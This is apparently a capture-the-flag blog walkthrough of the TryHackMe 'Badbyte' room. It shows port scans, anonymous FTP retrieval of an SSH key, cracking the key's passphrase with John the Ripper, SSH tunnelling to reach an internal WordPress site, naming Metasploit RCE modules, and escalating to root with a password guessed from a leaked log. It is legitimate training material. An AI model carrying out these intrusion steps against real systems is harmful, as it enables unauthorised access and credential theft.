Port forwarding is a networking technique that allows a user to access services on a computer or network behind a firewall or router. It opens up specific ports on a computer or network to allow external devices to connect and access services and applications on the internal network.
Challenge Overview
- Link: https://tryhackme.com/room/badbyte
- Difficulty: Easy
- Target: “user.txt”, “root.txt” on the targetIP
- Highlight: Using port forwarding to make an internal website accessible (i.e., hackable) outside the network.
- Tags: FTP, port forwarding
RECON
Let’s start by noting down our IP addresses and exporting them as variables in the terminal.
export targetIP=10.10.241.193 export myIP=10.6.2.23
Next, let’s run a standard Nmap scan. The -vv flag indicates very verbose output.
┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -p- -vv 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:24 EST
Initiating Ping Scan at 14:24
Scanning 10.10.241.193 [2 ports]
Completed Ping Scan at 14:24, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:24
Completed Parallel DNS resolution of 1 host. at 14:24, 0.03s elapsed
Initiating Connect Scan at 14:24
Scanning 10.10.241.193 [65535 ports]
Discovered open port 22/tcp on 10.10.241.193
Increasing send delay for 10.10.241.193 from 0 to 5 due to 45 out of 149 dropped probes since last increase.
Discovered open port 30024/tcp on 10.10.241.193
Now we’ll run another more targeted Nmap scan to drill in on the open ports.
┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -A -p 22,30024 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:26 EST
Nmap scan report for 10.10.241.193
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
| 256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_ 256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.6.2.23
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1743 Mar 23 2021 id_rsa
|_-rw-r--r-- 1 ftp ftp 78 Mar 23 2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 secondsLet’s focus first on the FTP service running on port 30024. It allows anonymous FTP login, so we should be able to view and copy the two files found in the directory.
We can log into the FTP service with the command:
lftp -p 30024 10.10.241.19
In the 2021 note.txt we find a clue mentioning a possible username: errorcauser
CRACKING THE SSH PASSCODE WITH JOHN
Let’s first attempt to log in without knowing the password using the id_rsa file as an ssh private key:
ssh -i id_rsa errorcauser@10.10.241.193
We get the following error: Permissions 0644 for 'id_rsa' are too open.
To use this key, we need to set more restrictive permissions on the file. We’ll use the following command:
sudo chmod 600 id_rsa
The other thing we need to do is use John the ripper to crack the passkey for the encrypted ssh key file.
First, we’ll set up the hash in a format acceptable to John the Ripper using ssh2john.py. My attack machine doesn’t have the program, so I grab it from this git repo and run it with the following command to save the hash in a new file.
python3 ssh2john.py id_rsa > hash
Next, we run John the Ripper on the hash with the simple command:
john hash
A few seconds later john finds a password match (errorcauser:cupcake). Now we have everything we need to ssh into the target machine.
SETTING UP PORT FORWARDING
In this box, the target machine has a firewall set up to block public access to the website hosted on port 80.
We can get around the firewall by setting up dynamic port forwarding. Let’s ssh into the target machine with the following command and our password (cupcake):
sudo ssh -i id_rsa -D 1337 errorcauser@10.10.241.193
(-D indicates dynamic port forwarding via an SSH tunnel on port 1337)
And we are in as user errorcauser!
Now we need to edit the proxychain file located at: /etc/proxychains.conf according to instructions in the TryHackMe instructions for this box to set up socks5 proxy on port 1337 for IP 127.0.0.1
Now let’s run an Nmap scan on the target machine via port forwarding with the command:
proxychains nmap -sT 127.0.0.1
(-sT for TCP connect scan)
Next, we need to set up local port forwarding with the command:
sudo ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.241.193
And now that everything is set up for port forwarding, we can check to see if our browser can open the website at http://127.0.0.1
Bingo! Port forwarding is now running as intended!
ENUMERATING WORDPRESS
Walking the website reveals hints that it is a WordPress site. We can use a special Nmap script to specifically enumerate WordPress sites:
sudo nmap -sV --script http-wordpress-enum 127.0.0.1
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $sudo nmap -sV --script http-wordpress-enum 127.0.0.1
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 15:12 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000060s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 100 themes/plugins
| plugins
|_ duplicator 1.3.26
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| Fpostmaster.c
| L2127
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.92%I=7%D=12/30%Time=63AF464A%P=x86_64-pc-linux-gnu%r(S
SF:MBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronte
SF:nd\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x20
SF:3\.0\0Fpostmaster\.c\0L2127\0RProcessStartupPacket\0\0");
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 secondsAnother option for WordPress enumeration is the classic command line tool: wpscan
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $wpscan --url 127.0.0.1
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.21
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://127.0.0.1/ [127.0.0.1]
[+] Started: Fri Dec 30 15:27:00 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1/, Match: 'WordPress 5.7'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <===============> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 15:27:10 2022
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 41.932 KB
[+] Data Received: 19.464 MB
[+] Memory used: 239.887 MB
[+] Elapsed time: 00:00:10EXPLOITING WORDPRESS PLUGINS WITH METASPLOIT
Now it is time to fire up Metasploit and search for modules that target the two plugins found on the site: duplicator and file-manager.
The first module (scanner/http/wp_duplicator_file_read) can retrieve a list of users and services running on the machine. We’ll save this for later in case it comes in handy.
The second module (multi/http/wp_file_manager_rce) enables remote code execution. We will go forward with this attack vector to gain our initial foothold.
And we’ve now found our user.txt file in user cth’s home directory. Next, we will continue enumerating the machine for ways to escalate privileges.
PRIVILEGE ESCALATION
The bash.log file can be found and accessed by user cth at /var/log/bash.log
A misspelling of sudo by cth caused him to accidentally type his previous password in cleartext (G00dP@$sw0rd2020). Maybe the new one is G00dP@$sw0rd2021.
Let’s try it and, lo and behold, it works! I think it’s time for user cth to get a completely new password, not just keep changing the end to the current year’s date!
After ssh’ing in as cth, we can search for root.txt:
ssh in as cth@10.10.241.193
And the final step is to cat out the root.txt
sudo cat /root/root.txt
Where To Next?
Among other tools, we used a port scanner in this tutorial. Want to dive deeper into security research? Read on here:
👉 Recommended Tutorial: Creating a Port Scanner with Python Networking Sockets
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.